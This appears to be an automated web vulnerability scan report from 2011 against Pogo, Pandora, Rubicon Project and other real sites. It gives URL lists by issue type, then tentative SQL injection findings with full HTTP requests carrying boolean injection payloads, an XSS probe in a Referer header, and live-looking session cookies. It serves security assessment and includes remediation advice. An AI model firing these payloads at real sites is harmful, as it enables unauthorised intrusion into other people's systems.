17.91. http://www.pandora.com/

17.92. http://www.pandora.com/backstage

17.93. http://www.pandora.com/facebook/xd_receiver.htm

17.94. http://www.pandora.com/login.vm

17.95. http://www.pandora.com/people/

17.96. http://www.peanutlabs.com/js/iFrame/sc.php

17.97. http://www.pogo.com/

17.98. http://www.pogo.com/

17.99. http://www.pogo.com/

17.100. http://www.pogo.com/action/pogo/confirmation.do

17.101. http://www.pogo.com/action/pogo/lightregview.do

17.102. http://www.pogo.com/all-games

17.103. http://www.pogo.com/all-games

17.104. http://www.pogo.com/arcade-sports-games

17.105. http://www.pogo.com/arcade-sports-games

17.106. http://www.pogo.com/board-games

17.107. http://www.pogo.com/cash-games

17.108. http://www.pogo.com/games/scrabble

17.109. http://www.pogo.com/oberon/navheader.jsp

17.110. http://www.pogo.com/oberon/navheader.jsp

17.111. http://www.pogo.com/prize/prize.do

17.112. http://www.pogo.com/word-games

17.113. https://www.pogo.com/action/pogo/signin.do

17.114. https://www.pogo.com/action/pogop/heavyregview.do

17.115. https://www.pogo.com/surveys/processZipSubs.do

17.116. https://www.pogo.com/surveys/surveysofferssubs.do

17.117. https://www.pogo.com/surveys/surveysofferssubs.do

17.118. http://www.rockband.com/

17.119. http://www.slidedeck.com/

17.120. http://www.thedailynews.cc/

17.121. http://www.thedailynews.cc/siteimages/featurephoto/cleardot.gif

17.122. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg

17.123. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg

17.124. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg

17.125. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg

17.126. http://www.weather.com/

17.127. http://www.weather.com/weather/local/48617

17.128. http://www.weather.com/weather/local/48858

17.129. http://www.weather.com/weather/local/48879

17.130. http://www.weather.com/weather/local/USMI0020

17.131. http://www.xanga.com/

17.132. http://www1.peanutlabs.com/

17.133. http://www1.peanutlabs.com/4-tips-to-better-monetize-social-games-with-offers/

17.134. http://www1.peanutlabs.com/author/admin/

17.135. http://www1.peanutlabs.com/author/alex-dempsey/

17.136. http://www1.peanutlabs.com/become-a-publisher/

17.137. http://www1.peanutlabs.com/peanut-labs-acquired-by-e-rewards-silo-breaker/

17.138. http://www1.peanutlabs.com/peanut-labs-acquired-by-online-research-company-e-rewards-2/

17.139. http://www1.peanutlabs.com/peanut-labs-inc-announces-acquisition-by-e-rrewards-inc/

17.140. http://www1.peanutlabs.com/social-networking-survey-startup-peanut-labs-sold-to-e-rewards-paidcontent/

17.141. http://www1.peanutlabs.com/social-networking-survey-startup-peanut-labs-sold-to-e-rewards/

17.142. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js

17.143. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/10/

17.144. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/11/

17.145. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/2/

17.146. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/3/

17.147. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/4/

17.148. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/5/

18. File upload functionality

19. Directory listing

20. Email addresses disclosed

20.1. http://blog.pandora.com/pandora/

20.2. http://blog.pandora.com/pandora/archives/2005/08/

20.3. http://blog.pandora.com/pandora/archives/2005/11/

20.4. http://blog.pandora.com/pandora/archives/2006/01/

20.5. http://blog.pandora.com/pandora/archives/2006/02/

20.6. http://blog.pandora.com/pandora/archives/2006/03/

20.7. http://blog.pandora.com/pandora/archives/2006/04/

20.8. http://blog.pandora.com/pandora/archives/2006/05/

20.9. http://blog.pandora.com/pandora/archives/2006/06/

20.10. http://blog.pandora.com/pandora/archives/2006/07/

20.11. http://blog.pandora.com/pandora/archives/2006/08/

20.12. http://blog.pandora.com/pandora/archives/2006/09/

20.13. http://blog.pandora.com/pandora/archives/2006/10/

20.14. http://blog.pandora.com/pandora/archives/2006/12/

20.15. http://blog.pandora.com/pandora/archives/2007/02/

20.16. http://blog.pandora.com/pandora/archives/2007/04/

20.17. http://blog.pandora.com/pandora/archives/2007/05/

20.18. http://blog.pandora.com/pandora/archives/2007/06/

20.19. http://blog.pandora.com/pandora/archives/2007/07/

20.20. http://blog.pandora.com/pandora/archives/2007/08/

20.21. http://blog.pandora.com/pandora/archives/2008/01/

20.22. http://blog.pandora.com/pandora/archives/2008/02/

20.23. http://blog.pandora.com/pandora/archives/2008/05/

20.24. http://blog.pandora.com/pandora/archives/2008/06/

20.25. http://blog.pandora.com/pandora/archives/2008/07/

20.26. http://blog.pandora.com/pandora/archives/2008/08/

20.27. http://blog.pandora.com/pandora/archives/2008/09/

20.28. http://blog.pandora.com/pandora/archives/2008/10/

20.29. http://blog.pandora.com/pandora/archives/2009/07/

20.30. http://blog.pandora.com/pandora/archives/2010/06/

20.31. http://blog.pandora.com/pandora/archives/2010/11/

20.32. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html

20.33. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html

20.34. http://blog.pandora.com/pandora/archives/arizona/

20.35. http://blog.pandora.com/pandora/archives/california/

20.36. http://blog.pandora.com/pandora/archives/colorado/

20.37. http://blog.pandora.com/pandora/archives/florida/

20.38. http://blog.pandora.com/pandora/archives/georgia/

20.39. http://blog.pandora.com/pandora/archives/illinois/

20.40. http://blog.pandora.com/pandora/archives/indiana/

20.41. http://blog.pandora.com/pandora/archives/massachusetts/

20.42. http://blog.pandora.com/pandora/archives/michigan/

20.43. http://blog.pandora.com/pandora/archives/minnesota/

20.44. http://blog.pandora.com/pandora/archives/missouri/

20.45. http://blog.pandora.com/pandora/archives/new-york/

20.46. http://blog.pandora.com/pandora/archives/north-carolina/

20.47. http://blog.pandora.com/pandora/archives/ohio/

20.48. http://blog.pandora.com/pandora/archives/oregon/

20.49. http://blog.pandora.com/pandora/archives/pennsylvania/

20.50. http://blog.pandora.com/pandora/archives/rhode-island/

20.51. http://blog.pandora.com/pandora/archives/roadtrip/

20.52. http://blog.pandora.com/pandora/archives/roadtrip/index.html

20.53. http://blog.pandora.com/pandora/archives/texas/

20.54. http://blog.pandora.com/pandora/archives/virginia/

20.55. http://blog.pandora.com/pandora/archives/washington-dc/

20.56. http://blog.pandora.com/pandora/archives/washington/

20.57. http://blog.pandora.com/pandora/index.xml

20.58. http://blog.pandora.com/pandora/jquery.dimension.js

20.59. http://board-games.pogo.com/v/ERWvfg/include/js/shared/markup2.js

20.60. http://card-games.pogo.com/v/ERWvfg/include/js/shared/markup2.js

20.61. http://dean.edwards.name/weblog/2006/06/again/

20.62. http://download-games.pogo.com/deluxe.aspx

20.63. http://jqueryui.com/about

20.64. http://www.adobe.com/aboutadobe/contact.html

20.65. http://www.adobe.com/aboutadobe/invrelations/

20.66. http://www.adobe.com/cfusion/marketplace/index.cfm

20.67. http://www.adobe.com/technology/

20.68. http://www.cmsinter.net/

20.69. http://www.cmsinter.net/blog/

20.70. http://www.ea.com/ipad

20.71. http://www.ea.com/iphone

20.72. http://www.ea.com/mobile

20.73. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

20.74. http://www.mlive.com/js/sitecatalyst/s_code.js

20.75. http://www.peanutlabs.com/core.php

20.76. http://www.peanutlabs.com/core.php

20.77. http://www.peanutlabs.com/media/case_studies.php

20.78. http://www.peanutlabs.com/media/company.php

20.79. http://www.peanutlabs.com/media/contact.php

20.80. http://www.peanutlabs.com/media/map.php

20.81. http://www.peanutlabs.com/media/privacy_policy.php

20.82. http://www.peanutlabs.com/media/publishers.php

20.83. http://www.peanutlabs.com/media/terms.php

20.84. http://www.peanutlabs.com/pl/privacyPolicy.php

20.85. http://www.peanutlabs.com/userGreeting.php

20.86. http://www.pogo.com/account/my-account/main.do

20.87. http://www.pogo.com/misc/advertise.jsp

20.88. http://www.pogo.com/prize/prize.do

20.89. http://www.pogo.com/v/ERWvfg/include/js/shared/markup2.js

20.90. http://www.pogo.com/v/ESf4UQ/js/lightreg.js

20.91. https://www.pogo.com/v/ERWvfg/include/js/shared/markup2.js

20.92. http://www.slidedeck.com/

21. Private IP addresses disclosed

21.1. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

21.2. http://www.adobe.com/events/main.jsp

21.3. http://www.facebook.com/peanutlabs

21.4. http://www.gamespot.com/

21.5. http://www.weather.com/weather/local/48617

21.6. http://www.weather.com/weather/local/48858

21.7. http://www.weather.com/weather/local/48879

21.8. http://www.weather.com/weather/local/USMI0020

22. Credit card numbers disclosed

23. Cacheable HTTPS response

23.1. https://www.pogo.com/action/pogo/signin.do

23.2. https://www.pogo.com/action/pogop/heavyregview.do

23.3. https://www.pogo.com/fbconnect/getstatus.do

23.4. https://www.pogo.com/legal/us/gems-prem-album-ts.html

23.5. https://www.pogo.com/surveys/peanutlabsprocesssubs.do

23.6. https://www.pogo.com/surveys/processZipSubs.do

23.7. https://www.pogo.com/surveys/surveysofferssubs.do

23.8. https://www.pogo.com/v/DV37sw/include/css/pogo.css

24. HTML does not specify charset

24.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2

24.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105

24.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98

24.4. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144

24.5. http://altfarm.mediaplex.com/ad/js/55290

24.6. http://assets.rubiconproject.com/static/rtb/sync-min.html

24.7. http://blog.pandora.com/

24.8. http://blog.pandora.com/pandora/archives/images/map.html

24.9. http://blog.pandora.com/pandora/assets_c/2010/11/North

24.10. http://blog.pandora.com/pandora/assets_c/2010/11/sd

24.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.12. http://download-games.pogo.com/Category.aspx

24.13. http://download-games.pogo.com/deluxe.aspx

24.14. http://download-games.pogo.com/game.htm

24.15. http://game3.pogo.com/blank.html

24.16. http://game3.pogo.com/room/util/silentclosepage.html

24.17. http://game3.pogo.com/v/11.1.9.13/applet/scrabble/

24.18. http://game3.pogo.com/v/11.1.9.44/applet/jvmtest/

24.19. http://jqueryui.com/about

24.20. http://jqueryui.com/themeroller/

24.21. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js

24.22. http://www.e00.peanutlabs.com/js/iFrame/sc.php

24.23. http://www.e00.peanutlabs.com/recvMid.php

24.24. http://www.intellicast.com/Travel/CheapFlightsWidget.htm

24.25. http://www.pandora.com/facebook/xd_receiver.htm

24.26. http://www.pandora.com/include/backstageAdEmbed.html

24.27. http://www.pandora.com/include/communityAdEmbed.html

24.28. http://www.peanutlabs.com/generateUserId.php

24.29. http://www.peanutlabs.com/js/iFrame/sc.php

24.30. http://www.peanutlabs.com/recvMid.php

24.31. http://www.peanutlabs.com/sampleIframe.php

24.32. https://www.pogo.com/v/FEoeug/reg/stylesheets/flow_1/imagesreg%0Flow_1ot.png

24.33. http://www.thedailynews.cc/

24.34. http://www.thedailynews.cc/siteimages/featurephoto/cleardot.gif

24.35. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg

24.36. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg

24.37. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg

24.38. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg

24.39. http://www1.peanutlabs.com/wp-content/themes/showtime/scripts/timthumb.php

25. Content type incorrectly stated

25.1. http://altfarm.mediaplex.com/ad/js/55290

25.2. http://board-games.pogo.com/img/header/main/en_US/pogo/header-home.jpg

25.3. http://board-games.pogo.com/include/js/java-detect.jsp

25.4. http://board-games.pogo.com/v/DV37sw/include/css/pogo.css

25.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.6. http://card-games.pogo.com/img/header/main/en_US/pogo/header-home.jpg

25.7. http://card-games.pogo.com/include/js/java-detect.jsp

25.8. http://card-games.pogo.com/v/DV37sw/include/css/pogo.css

25.9. http://download-games.pogo.com/Category.aspx

25.10. http://download-games.pogo.com/deluxe.aspx

25.11. http://event.adxpose.com/event.flow

25.12. http://game3.pogo.com/include/css/pogo.css

25.13. http://www.cmsinter.net/blog/wp-content/uploads/2011/01/image.jpeg

25.14. http://www.e00.peanutlabs.com/recvMid.php

25.15. http://www.facebook.com/extern/login_status.php

25.16. http://www.mlive.com/08design/images/regions_bar_image.gif

25.17. http://www.mlive.com/08design/images/regions_bar_statewide.gif

25.18. http://www.mlive.com/08design/images/samples/weather_map_thumbnail.jpg

25.19. http://www.mlive.com/favicon.ico

25.20. http://www.peanutlabs.com/publisher/dashboard2/framework_3.2.0.3958.swz

25.21. http://www.peanutlabs.com/recvMid.php

25.22. http://www.pogo.com/hotdeploy/us/homepage/img/clubpogo-info/Default-US_91710.jpg

25.23. http://www.pogo.com/img/header/main/en_US/pogo/header-home.jpg

25.24. http://www.pogo.com/include/css/pogo.css

25.25. http://www.pogo.com/include/js/java-detect.jsp

25.26. http://www.pogo.com/v/DV37sw/include/css/pogo.css

25.27. http://www.pogo.com/vl/img/misc/sidenav/en_US/pogo/s-icon-cash.png

25.28. http://www.pogo.com/vl/img/prize/en_US/pogo/daily-prize-drawings.gif

25.29. https://www.pogo.com/surveys/peanutlabsprocesssubs.do

25.30. https://www.pogo.com/v/DV37sw/include/css/pogo.css

25.31. http://www.slidedeck.com/wp-content/plugins/slidedeck/lib/slidedeck.jquery.js

25.32. http://www1.peanutlabs.com/wp-content/themes/showtime/scripts/timthumb.php

26. Content type is not specified

26.1. http://ads.bluelithium.com/st

26.2. http://adserving.cpxinteractive.com/st

26.3. http://board-games.pogo.com/favicon.ico

26.4. http://card-games.pogo.com/favicon.ico

26.5. http://click.linksynergy.com/fs-bin/stat

26.6. http://game3.pogo.com/favicon.ico

26.7. http://r.turn.com/favicon.ico

26.8. http://www.pogo.com/favicon.ico

26.9. https://www.pogo.com/favicon.ico

27. SSL certificate



1. SQL injection
There are 28 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html'%20and%201%3d1--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 234
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:02:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html' and 1=1-- was not found o
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb/sync-min.html'%20and%201%3d2--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 325
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:02:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html' and 1=2-- was not found o
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.2. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb'%20and%201%3d1--%20/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 235
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:54 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb' and 1=1-- /sync-min.html/ was not found
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb'%20and%201%3d2--%20/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 326
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:54 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb' and 1=2-- /sync-min.html/ was not found
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.3. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 21123539'%20or%201%3d1--%20 and 21123539'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html21123539'%20or%201%3d1--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 242
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html21123539' or 1=1-- / was not
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb/sync-min.html21123539'%20or%201%3d2--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 333
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html21123539' or 1=2-- / was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.4. http://clubpogo-games.pogo.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://clubpogo-games.pogo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17880153%20or%201%3d1--%20 and 17880153%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?117880153%20or%201%3d1--%20=1 HTTP/1.1
Host: clubpogo-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=65DADE84E709C901040324B63D290171.000033; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606376960931499; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:22 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:07:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 104734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="navlink" href="http://www.pogo.com/action/pogo/createAccount.do?returnType=allGames&returnValue=allgames%7CplayersOnline%7Cnull&pageSection=header_reg" target="_top">Register</a></li>
               
               
               
               
           
               
               
               
               
               
               
               
               
               
               
               
               
               
                   
                   <li id="tn-downloads"><a class="navlink" href="http://download-games.pogo.com/?site=pogo&refid=headernav_fp_pogotab&ifw=756&pageSection=header_downloads&ifh=210&lkey=x" target="_top" id="downloads-link">Downloads</a></li>
               
               
               
               
               
               
           
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
                   
                   
                       <li id="tn-iphone">
                           <a href="/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=header_iphone" target="_top" class="navlink">IPHONE</a>
                       </li>
                   
               
               
           
       </ul>
   

</div>





<div id="page-wrapper" class="clearfix">
   
       

















<div id="stepSize" style="display:none;">20</div>
<div id="totalItems" style="display:none;">44</div>
<div id="removeFavoritesLocalizedText" style="display:none;">Remove from Favorites </div>
<div id="addFavoritesLocalizedText" style="display:none;">Add to Favorites</div>






   
       
       
   











   
       <div id="catBelt">
           <ul id="catList" class="items10">
               
                   
                       
                   
                   
               
               
                   
                   

                   <li id="allgames" >
                       
                           

<a href="http://www.pogo.com/all-games?pageSection=homecat_allgames">
                                   All Games
                               </a>
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                       
                   </li>
               
                   
                   

                   <li id="puzzle" >
                       
                           
                           

<a href="http://puzzle-games.pogo.com/?pageSection=homecat_puzzle">
                                   Puzzle<br/>Games
                               </a>
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                       
                   </li>
               
                   
                   

                   <li id="board" >
                   
...[SNIP]...

Request 2

GET /?117880153%20or%201%3d2--%20=1 HTTP/1.1
Host: clubpogo-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=1CE604B86F6E71704329681DD1F7145C.000305; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606402730718127; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:22 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:07:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 104744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="navlink" href="http://www.pogo.com/action/pogo/createAccount.do?returnType=allGames&returnValue=onlineFreeTrial%7CplayersOnline%7Cnull&pageSection=header_reg" target="_top">Register</a></li>
               
               
               
               
           
               
               
               
               
               
               
               
               
               
               
               
               
               
                   
                   <li id="tn-downloads"><a class="navlink" href="http://download-games.pogo.com/?site=pogo&refid=headernav_fp_pogotab&ifw=756&pageSection=header_downloads&ifh=210&lkey=x" target="_top" id="downloads-link">Downloads</a></li>
               
               
               
               
               
               
           
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
                   
                   
                       <li id="tn-iphone">
                           <a href="/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=header_iphone" target="_top" class="navlink">IPHONE</a>
                       </li>
                   
               
               
